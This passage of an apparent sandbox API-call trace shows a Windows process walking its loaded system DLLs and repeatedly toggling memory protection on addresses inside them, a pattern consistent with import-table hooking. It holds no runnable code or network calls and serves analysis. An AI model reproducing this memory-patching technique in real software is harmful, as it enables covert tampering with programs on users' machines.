[0052.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77350ce8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77350000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.819] GetCurrentProcess () returned 0xffffffff [0052.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77350ce8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77350000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.819] GetCurrentProcess () returned 0xffffffff [0052.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77350cf4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77350000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.819] GetCurrentProcess () returned 0xffffffff [0052.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77350cf4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77350000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.820] GetCurrentProcess () returned 0xffffffff [0052.820] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7735106c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.820] GetCurrentProcess () returned 0xffffffff [0052.820] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7735106c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.820] GetCurrentProcess () returned 0xffffffff [0052.820] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7735107c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.820] GetCurrentProcess () returned 0xffffffff [0052.820] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7735107c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.820] GetCurrentProcess () returned 0xffffffff [0052.820] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351118, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.821] GetCurrentProcess () returned 0xffffffff [0052.821] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351118, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.821] GetCurrentProcess () returned 0xffffffff [0052.821] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7735111c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.821] GetCurrentProcess () returned 0xffffffff [0052.821] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7735111c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.821] GetCurrentProcess () returned 0xffffffff [0052.821] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7735121c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.821] GetCurrentProcess () returned 0xffffffff [0052.821] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7735121c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.822] GetCurrentProcess () returned 0xffffffff [0052.822] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351220, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.822] GetCurrentProcess () returned 0xffffffff [0052.822] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351220, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.822] GetCurrentProcess () returned 0xffffffff [0052.822] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773512e4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.822] GetCurrentProcess () returned 0xffffffff [0052.822] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773512e4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.822] GetCurrentProcess () returned 0xffffffff [0052.822] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351388, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.822] GetCurrentProcess () returned 0xffffffff [0052.823] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351388, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.823] GetCurrentProcess () returned 0xffffffff [0052.823] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351394, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.823] GetCurrentProcess () returned 0xffffffff [0052.823] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351394, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.823] GetCurrentProcess () returned 0xffffffff [0052.823] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7735146c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.823] GetCurrentProcess () returned 0xffffffff [0052.823] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7735146c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.823] GetCurrentProcess () returned 0xffffffff [0052.823] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351614, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.824] GetCurrentProcess () returned 0xffffffff [0052.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351614, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.824] GetCurrentProcess () returned 0xffffffff [0052.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773518a4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.824] GetCurrentProcess () returned 0xffffffff [0052.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773518a4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.824] GetCurrentProcess () returned 0xffffffff [0052.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773518a8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.824] GetCurrentProcess () returned 0xffffffff [0052.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773518a8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.825] GetCurrentProcess () returned 0xffffffff [0052.825] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773518ac, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.825] GetCurrentProcess () returned 0xffffffff [0052.825] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773518ac, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.825] GetCurrentProcess () returned 0xffffffff [0052.825] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773518b0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.825] GetCurrentProcess () returned 0xffffffff [0052.825] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x773518b0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.825] GetCurrentProcess () returned 0xffffffff [0052.825] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351904, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.825] GetCurrentProcess () returned 0xffffffff [0052.825] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351904, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.826] GetCurrentProcess () returned 0xffffffff [0052.826] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351910, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.826] GetCurrentProcess () returned 0xffffffff [0052.826] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351910, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.826] GetCurrentProcess () returned 0xffffffff [0052.826] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351914, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.826] GetCurrentProcess () returned 0xffffffff [0052.826] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351914, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.826] GetCurrentProcess () returned 0xffffffff [0052.827] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351b60, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.827] GetCurrentProcess () returned 0xffffffff [0052.827] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351b60, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.827] GetCurrentProcess () returned 0xffffffff [0052.827] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351e18, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.827] GetCurrentProcess () returned 0xffffffff [0052.827] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77351e18, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77351000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.828] GetCurrentProcess () returned 0xffffffff [0052.828] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7735204c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77352000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.828] GetCurrentProcess () returned 0xffffffff [0052.828] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7735204c, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77352000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.828] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.829] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.829] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.829] GetModuleFileNameA (in: hModule=0x74bc0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0052.829] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.830] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.830] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.830] GetModuleFileNameA (in: hModule=0x74390000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\SYSTEM32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")) returned 0x1f [0052.831] GetCurrentProcess () returned 0xffffffff [0052.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74403114, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74403000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.831] GetCurrentProcess () returned 0xffffffff [0052.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74403114, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74403000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.831] GetCurrentProcess () returned 0xffffffff [0052.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74403128, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74403000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.831] GetCurrentProcess () returned 0xffffffff [0052.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x74403128, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x74403000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.832] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.833] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.833] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.833] GetModuleFileNameA (in: hModule=0x750c0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0052.833] GetCurrentProcess () returned 0xffffffff [0052.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7514e3a8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7514e000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.833] GetCurrentProcess () returned 0xffffffff [0052.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7514e3a8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7514e000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.834] GetCurrentProcess () returned 0xffffffff [0052.834] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7514e3b0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7514e000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.834] GetCurrentProcess () returned 0xffffffff [0052.834] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7514e3b0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7514e000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.835] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.835] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.835] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.835] GetModuleFileNameA (in: hModule=0x77420000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll")) returned 0x1e [0052.836] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.836] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.836] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.836] GetModuleFileNameA (in: hModule=0x74910000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0052.837] GetCurrentProcess () returned 0xffffffff [0052.837] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7492a034, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7492a000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.837] GetCurrentProcess () returned 0xffffffff [0052.837] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7492a034, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7492a000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.837] GetCurrentProcess () returned 0xffffffff [0052.837] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7492a038, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7492a000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.838] GetCurrentProcess () returned 0xffffffff [0052.838] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x7492a038, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x7492a000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.838] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.839] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.839] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.839] GetModuleFileNameA (in: hModule=0x774e0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll")) returned 0x21 [0052.840] GetCurrentProcess () returned 0xffffffff [0052.840] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x776172e0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77617000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.840] GetCurrentProcess () returned 0xffffffff [0052.840] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x776172e0, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77617000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.840] GetCurrentProcess () returned 0xffffffff [0052.840] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77617308, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77617000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.841] GetCurrentProcess () returned 0xffffffff [0052.841] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77617308, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77617000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.842] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.844] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.844] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.844] GetModuleFileNameA (in: hModule=0x75650000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll")) returned 0x21 [0052.844] GetCurrentProcess () returned 0xffffffff [0052.844] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, 